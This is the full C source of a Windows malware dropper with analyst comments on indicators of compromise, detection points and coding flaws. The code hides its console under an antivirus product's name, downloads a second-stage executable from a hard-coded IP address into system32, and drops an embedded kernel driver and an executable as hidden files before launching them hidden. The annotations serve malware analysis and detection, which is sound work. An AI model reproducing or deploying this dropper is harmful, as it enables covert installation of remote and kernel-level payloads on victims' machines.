#include <windows.h>
#include <stdio.h>
#include <urlmon.h>
#include "afxres.h"
#pragma comment(lib,"urlmon.lib")
#define IDR_EXE1 101
#define IDR_DRIVER1 102
// Analyst note: drops an executable payload carried in the binary's own
// resource section (type "EXE", id IDR_EXE1) to C:\WINDOWS\system32\<theResourceName>
// as a hidden file. Returns false if the resource cannot be located/loaded or
// the file cannot be created; returns true after writing, or when CreateFile
// fails with ERROR_ALREADY_EXISTS or error 32 (ERROR_SHARING_VIOLATION).
// Despite the name, nothing is decompressed: bytes are copied verbatim.
// theResourceName is only used as the destination file name.
bool _util_decompress_file(char *theResourceName)
{
HRSRC aResourceH;
HGLOBAL aResourceHGlobal;
unsigned char * aFilePtr;
unsigned long aFileSize;
HANDLE file_handle;
char filename[64];
// 20-char prefix in a 50-byte buffer; filename may be up to 62 chars after
// the _snprintf below, so the strcat can overflow fPath for long names.
// The callers in main() pass short names, so it does not overflow there.
char fPath[50] = "C:\\WINDOWS\\system32\\";
// Payload lives in the dropper's own resources -> static extraction is possible
// with any resource viewer (look for a custom resource type "EXE").
aResourceH = FindResource(NULL,MAKEINTRESOURCE(IDR_EXE1),"EXE");
if(!aResourceH)
{
return false;
}
aResourceHGlobal = LoadResource(NULL, aResourceH);
if(!aResourceHGlobal)
{
return false;
}
aFileSize = SizeofResource(NULL, aResourceH);
aFilePtr = (unsigned char *)LockResource(aResourceHGlobal);
if(!aFilePtr)
{
return false;
}
// Copies at most 62 bytes of the name; _snprintf does not guarantee NUL
// termination on truncation (filename[63] is never written here).
_snprintf(filename, 62, "%s", theResourceName);
strcat(fPath,filename);
// Share mode 0 (exclusive), CREATE_ALWAYS (overwrite), hidden attribute.
// Detection point: hidden-file creation under system32 by a non-installer.
file_handle = CreateFile(fPath,
FILE_ALL_ACCESS,
0,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_HIDDEN,
NULL);
if(INVALID_HANDLE_VALUE == file_handle)
{
int err = GetLastError();
// 32 == ERROR_SHARING_VIOLATION: the target is already open (presumably an
// earlier copy already running), treated as "already dropped". Note that
// with CREATE_ALWAYS an existing file is overwritten and CreateFile succeeds
// (ERROR_ALREADY_EXISTS is set as last-error, not returned as failure), so
// the ERROR_ALREADY_EXISTS branch is effectively unreachable.
if( (ERROR_ALREADY_EXISTS ==err) || (32 == err) )
{
return true;
}
return false;
}
// One WriteFile call per byte; the return value and numWritten are never
// checked, so a partial write still reports success.
while(aFileSize--)
{
unsigned long numWritten;
WriteFile(file_handle, aFilePtr, 1, &numWritten, NULL);
aFilePtr++;
}
CloseHandle(file_handle);
return true;
}
// Analyst note: identical logic to _util_decompress_file, differing only in the
// resource (type "driver", id IDR_DRIVER1) and the destination directory
// C:\WINDOWS\system32\drivers\. Drops a kernel-driver payload from the
// resource section as a hidden file. Return semantics are the same: false on
// resource/CreateFile failure, true after writing or when CreateFile fails
// with ERROR_ALREADY_EXISTS or error 32 (ERROR_SHARING_VIOLATION).
// This function only writes the file; it does not create or start a service
// for the driver.
bool _util_decompress_sysfile(char *theResourceName)
{
HRSRC aResourceH;
HGLOBAL aResourceHGlobal;
unsigned char * aFilePtr;
unsigned long aFileSize;
HANDLE file_handle;
char filename[64];
// 28-char prefix in a 50-byte buffer; with up to 62 chars of filename the
// strcat below can overflow fPath for long names (main() passes "https.sys").
char fPath[50] = "C:\\WINDOWS\\system32\\drivers\\";
// Custom resource type "driver" -> extractable statically from the dropper.
aResourceH = FindResource(NULL,MAKEINTRESOURCE(IDR_DRIVER1),"driver");
if(!aResourceH)
{
return false;
}
aResourceHGlobal = LoadResource(NULL, aResourceH);
if(!aResourceHGlobal)
{
return false;
}
aFileSize = SizeofResource(NULL, aResourceH);
aFilePtr = (unsigned char *)LockResource(aResourceHGlobal);
if(!aFilePtr)
{
return false;
}
// At most 62 bytes copied; not guaranteed NUL-terminated on truncation.
_snprintf(filename, 62, "%s", theResourceName);
strcat(fPath,filename);
// Exclusive share mode, overwrite, hidden attribute.
// Detection point: a hidden .sys written into system32\drivers.
file_handle = CreateFile(fPath,
FILE_ALL_ACCESS,
0,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_HIDDEN,
NULL);
if(INVALID_HANDLE_VALUE == file_handle)
{
int err = GetLastError();
// 32 == ERROR_SHARING_VIOLATION (file in use, presumably a loaded driver)
// is treated as success. ERROR_ALREADY_EXISTS is not returned as a failure
// under CREATE_ALWAYS, so that half of the condition is effectively dead.
if( (ERROR_ALREADY_EXISTS ==err) || (32 == err) )
{
return true;
}
return false;
}
// Byte-at-a-time WriteFile with unchecked result; partial writes are not
// detected.
while(aFileSize--)
{
unsigned long numWritten;
WriteFile(file_handle, aFilePtr, 1, &numWritten, NULL);
aFilePtr++;
}
CloseHandle(file_handle);
return true;
}
// Analyst note: dropper entry point. Sequence observed here:
//   1. Hide its own console window (title set to "ALYac", then FindWindow +
//      SW_HIDE). "ALYac" matches the name of a Korean AV product, presumably
//      chosen so the window blends in if it is seen.
//   2. Download a second-stage executable from a hard-coded URL to
//      C:\WINDOWS\system32\ipv4.exe (URLDownloadToFile -> urlmon.dll).
//   3. On success, drop the embedded driver (https.sys) and executable
//      (diskfind.exe) from the resource section, then launch ipv4.exe and
//      diskfind.exe hidden. On download failure, exit silently.
// IoCs on this page: the download URL/host, system32\ipv4.exe,
// system32\drivers\https.sys, system32\diskfind.exe (all hidden files).
// `void main()` is non-standard (should be `int main`), and the return values
// of both drop helpers are ignored.
void main()
{
HWND hwnd;
char ALYac[10] = "ALYac";
SetConsoleTitle(ALYac);
hwnd = FindWindow(NULL,ALYac);
ShowWindow(hwnd,SW_HIDE);
// Hard-coded C2/download location and drop path (network + file IoCs).
char Path[100] = "http://124.197.133.42/board/upload/ipv4.exe";
char File[100] = "C:\\WINDOWS\\system32\\ipv4.exe";
Sleep(1);
// urlmon download; leaves a WinINet/urlmon cache and proxy footprint that
// is visible to network monitoring and host-based telemetry.
HRESULT hr1 = URLDownloadToFile(0,Path,File,0,NULL);
if(SUCCEEDED(hr1))
{
// Driver file is only written here; it is not registered or started in
// this code, so presumably one of the launched executables does that.
_util_decompress_sysfile("https.sys");
_util_decompress_file("diskfind.exe");
// Both launched with SW_HIDE and working directory system32; relative
// file names resolve against that directory.
ShellExecute(NULL,"open","ipv4.exe",NULL,"C:\\WINDOWS\\system32",SW_HIDE);
ShellExecute(NULL,"open","diskfind.exe",NULL,"C:\\WINDOWS\\system32",SW_HIDE);
}
else
{
// No retry and no local payload deployment if the download fails.
ExitProcess(0);
}
}